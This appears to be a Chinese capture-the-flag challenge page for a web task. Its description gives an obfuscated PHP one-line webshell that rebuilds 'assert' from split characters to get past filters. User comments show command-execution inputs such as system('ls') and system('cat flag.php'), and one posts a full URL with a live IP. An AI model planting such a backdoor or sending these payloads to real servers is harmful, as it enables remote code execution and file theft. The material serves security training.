shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 9067
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
wangsir 1月前

得到assert($_GET['s']),对s赋值找到flag文件

回复 0

聪仔草莓51 2月前

源码将字符串 a#s#s#e#r#t 按分隔符拆分后重新拼接成函数名 assert,并调用 assert(传入参数)。该函数在旧版本 PHP 中会把传入字符串当作代码执行,因此构造参数即可执行任意 PHP 代码。 利用方式:传入列目录的参数找到 flag 文件名,再传入读取文件的参数获取内容,即可得到本题答案。

回复 0

西红柿dun牛腩 2月前

这道题目,需要一点基础知识,还需要一些脑洞,初学者不容易想到。很好的学习素材

回复 1

yiqie 2月前

flag{**********}

回复 0

icyskin 2月前

http://160.202.254.160:19320/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

ggsea 3月前

列出当前目录:?s=print_r(scandir('./')),看到flag.txt

回复 0

lawrencekz 4月前

flag{******}

回复 0

hwx 4月前

直接先?s=system('ls'),就看到啦flg的文档再?s=system('cat flg的文档'),就看到flg

回复 3

b2026tf 4月前

本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');

回复 0

syhaisy 5月前

20702af5309ab1f70e0f7e8a81076a4e

回复 0

WriteUp

image
harry

3 金币

评分(11)

解题动态

诸诸诸 攻破了该题 6小时前
mjq1210 攻破了该题 7小时前
xiaoxiang07 攻破了该题 9小时前
fhdsfghfgf 攻破了该题 10小时前
muhkter8 攻破了该题 1天前
ysjy 攻破了该题 1天前
15369226763 攻破了该题 2天前
Asen 攻破了该题 2天前
doubao007 攻破了该题 2天前
re_void 攻破了该题 3天前
写作业ing 攻破了该题 3天前
wefyh 攻破了该题 3天前
花开花落 攻破了该题 3天前
LV-Yang 攻破了该题 3天前
sin 攻破了该题 3天前
debug3 攻破了该题 4天前
wangluobugeili 攻破了该题 4天前
ZyTbF521 攻破了该题 5天前
氧气舱 攻破了该题 5天前
HSZT 攻破了该题 5天前
问题反馈